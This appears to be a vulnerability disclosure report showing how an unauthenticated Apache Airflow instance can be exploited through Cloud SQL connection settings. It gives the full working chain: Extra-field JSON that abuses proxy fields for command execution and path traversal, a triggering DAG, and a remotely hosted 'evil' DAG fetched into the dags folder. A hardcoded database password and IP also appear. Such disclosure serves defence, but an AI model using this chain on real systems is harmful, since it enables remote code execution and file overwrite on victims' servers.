Create the following Google Cloud SQL database connection named aaa under the Admin -> Connections menu. Host, Schema, Login, and Port are required; any values that match the expected format will do.
{F2213508}
The actual content of the Extra field is as follows. Note that sql_proxy_version must look like ?a=, and sql_proxy_binary_path is set to the command to be executed; here we use whoami.
{
    "project_id": "pivotal-gearing-375804",
    "instance": "hellopg",
    "location": "us-central1-b",
    "database_type": "postgres",
    "use_proxy": "True",
    "use_ssl": "False",
    "sql_proxy_use_tcp": "True",
    "sql_proxy_version": "?a=",
    "sql_proxy_binary_path": "whoami",
    "sslcert": "",
    "sslkey": "",
    "sslrootcert": ""
}
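To see why these two fields matter, here is a minimal sketch of how a proxy runner might interpolate the version string into a download URL. This is a hypothetical illustration, not the actual Airflow code: the function name and URL template are assumptions based on the behavior observed later in this report.

```python
# Hypothetical sketch: assume the runner interpolates the unvalidated
# sql_proxy_version value straight into a download URL template.
def build_proxy_download_url(version: str) -> str:
    return (
        "https://storage.googleapis.com/cloudsql-proxy/"
        f"{version}/cloud_sql_proxy.linux.amd64"
    )

# A version of "?a=" pushes the rest of the template into the query string,
# so the expected "/<version>/cloud_sql_proxy.linux.amd64" path is neutralized.
url = build_proxy_download_url("?a=")
print(url)
```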
Create a google_test.py script that uses the CloudSQLExecuteQueryOperator operator and place it in the /opt/airflow/dags directory so that it is automatically loaded by Airflow. Its content is as follows; gcp_cloudsql_conn_id is set to aaa, the connection we created above.
from __future__ import annotations

import os
import subprocess
from datetime import datetime
from os.path import expanduser
from urllib.parse import quote_plus

from airflow import models
from airflow.providers.google.cloud.operators.cloud_sql import CloudSQLExecuteQueryOperator

SQL = [
    "CREATE TABLE IF NOT EXISTS TABLE_TEST (I INTEGER)",
    "CREATE TABLE IF NOT EXISTS TABLE_TEST (I INTEGER)",  # shows warnings logged
    "INSERT INTO TABLE_TEST VALUES (0)",
    "CREATE TABLE IF NOT EXISTS TABLE_TEST2 (I INTEGER)",
    "DROP TABLE TABLE_TEST",
    "DROP TABLE TABLE_TEST2",
]

postgres_kwargs = dict(
    user="postgres",
    password=r"ktd2(%EzQ5",
    public_port="5432",
    public_ip="34.122.52.6",
    project_id="pivotal-gearing-375804",
    location="us-central1-b",
    instance="hellopg",
    database="postgres",
    client_cert_file=".key/postgres-client-cert.pem",
    client_key_file=".key/postgres-client-key.pem",
    server_ca_file=".key/postgres-server-ca.pem",
)

# Postgres: connect via proxy over TCP
os.environ["AIRFLOW_CONN_PROXY_POSTGRES_TCP"] = (
    "gcpcloudsql://{user}:{password}@{public_ip}:{public_port}/{database}?"
    "database_type=postgres&"
    "project_id={project_id}&"
    "location={location}&"
    "instance={instance}&"
    "use_proxy=True&"
    "sql_proxy_use_tcp=True".format(**postgres_kwargs)
)

connection_names = [
    "proxy_postgres_tcp",
]

with models.DAG(
    dag_id="example_gcp_sql_query",
    start_date=datetime(2021, 1, 1),
    catchup=False,
    tags=["example"],
) as dag:
    prev_task = None
    task = CloudSQLExecuteQueryOperator(
        gcp_cloudsql_conn_id="aaa",
        gcp_conn_id="proxy_postgres_tcp",
        task_id="example_gcp_sql_task_proxy_postgres_tcp",
        sql=SQL,
    )
    # [END howto_operator_cloudsql_query_operators]
Enable the example_gcp_sql_query DAG corresponding to our google_test.py script in the UI, and run it.
View the run's graph and logs through the Graph menu.
{F2213514}
The log shows that the victim machine executed the malicious command whoami that we planted in sql_proxy_binary_path.
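Conceptually, once the download and verification steps are neutralized, starting the "proxy" amounts to executing whatever path sql_proxy_binary_path contains. A rough stand-in (not Airflow's actual code) using the whoami value from our Extra field:

```python
import subprocess

# Rough illustration only: launching the configured "proxy binary" is, in
# effect, executing an attacker-controlled command on the worker.
sql_proxy_binary_path = "whoami"  # attacker-controlled value from Extra
proc = subprocess.run([sql_proxy_binary_path], capture_output=True, text=True)
print(proc.stdout.strip())  # the user the Airflow worker runs as
```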
{F2213518}
Host our malicious DAG on Google Cloud Storage at https://storage.googleapis.com/swordlight/load_my_evil_dag.py. Its content is as follows:
from __future__ import annotations
import pendulum
from airflow import DAG
from airflow.decorators import task
from airflow.operators.bash import BashOperator
with DAG(
    dag_id="load_my_evil_dag",
    start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
    catchup=False,
    schedule=None,
    tags=["example"],
) as dag:
    bash_task = BashOperator(
        task_id="bash_task",
        bash_command="mkdir /tmp/success",
    )
The purpose of this script is to create the /tmp/success folder.
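To make the effect concrete, the bash_command above is roughly equivalent to this Python snippet (exist_ok is added here so the sketch is idempotent, unlike a plain mkdir):

```python
import pathlib

# Same observable effect as `mkdir /tmp/success`
marker = pathlib.Path("/tmp/success")
marker.mkdir(exist_ok=True)
print(marker.is_dir())
```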
{F2213523}
Modify the content of the Extra field as follows:
{
    "project_id": "pivotal-gearing-375804",
    "instance": "hellopg",
    "location": "us-central1-b",
    "database_type": "postgres",
    "use_proxy": "True",
    "use_ssl": "False",
    "sql_proxy_use_tcp": "True",
    "sql_proxy_version": "../swordlight/load_my_evil_dag.py?a=",
    "sql_proxy_binary_path": "/../../../opt/airflow/dags/load_my_evil_dag.py",
    "sslcert": "",
    "sslkey": "",
    "sslrootcert": ""
}
Run the DAG again and check the task log: the victim machine sends a request to https://storage.googleapis.com/cloudsql-proxy/../swordlight/load_my_evil_dag.py?a=/cloud_sql_proxy.linux.amd64 (i.e. https://storage.googleapis.com/swordlight/load_my_evil_dag.py), downloads the load_my_evil_dag.py script, and saves it as /../../../opt/airflow/dags/load_my_evil_dag.py (i.e. /opt/airflow/dags/load_my_evil_dag.py).
You can also see the load_my_evil_dag.py file in /opt/airflow/dags on the worker terminal.
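Both halves of this trick rely on ordinary URL and path normalization. A quick sanity check (using urljoin and normpath here only to illustrate the resolution; in the actual attack the normalization happens server-side and in the filesystem, respectively):

```python
import os
from urllib.parse import urljoin

# The "../" in sql_proxy_version escapes the cloudsql-proxy prefix,
# redirecting the download to our bucket.
base = "https://storage.googleapis.com/cloudsql-proxy/"
print(urljoin(base, "../swordlight/load_my_evil_dag.py?a="))

# The leading "/../../../" in sql_proxy_binary_path collapses back to the
# dags folder, so the downloaded file lands where the scheduler loads DAGs.
print(os.path.normpath("/../../../opt/airflow/dags/load_my_evil_dag.py"))
```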
{F2213525}
{F2213528}
The DAGs list in the UI also shows that our DAG named load_my_evil_dag has been loaded successfully.
{F2213530}
Enable and run load_my_evil_dag. After it runs, you can see that the /tmp/success folder is created successfully.
{F221353
When Airflow does not enable authentication, an attacker can modify existing connection configuration so that any DAG in the system that uses CloudSQLExecuteQueryOperator executes malicious commands, or overwrites and creates arbitrary files (which can lead to denial of service), at runtime.